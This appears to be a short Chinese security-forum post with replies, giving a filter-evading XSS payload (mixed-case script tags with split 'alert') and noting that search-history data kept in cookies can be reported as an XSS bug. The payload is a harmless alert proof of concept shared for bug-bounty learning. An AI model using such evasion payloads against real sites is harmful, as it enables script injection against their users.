payload:"<sCriPt>setTimeout('ale'%2b'rt(/XSS/)',0)</sCriPt>
网站记录用户的历史查询记录往往都是以cookie的方式保存,安全策略往往很少覆盖到这类数据,该类型漏洞可当作xss的危害进行提交。
火线小助手 66667
学费了
jack13 你学费了吗
jack13 学费了教教俺
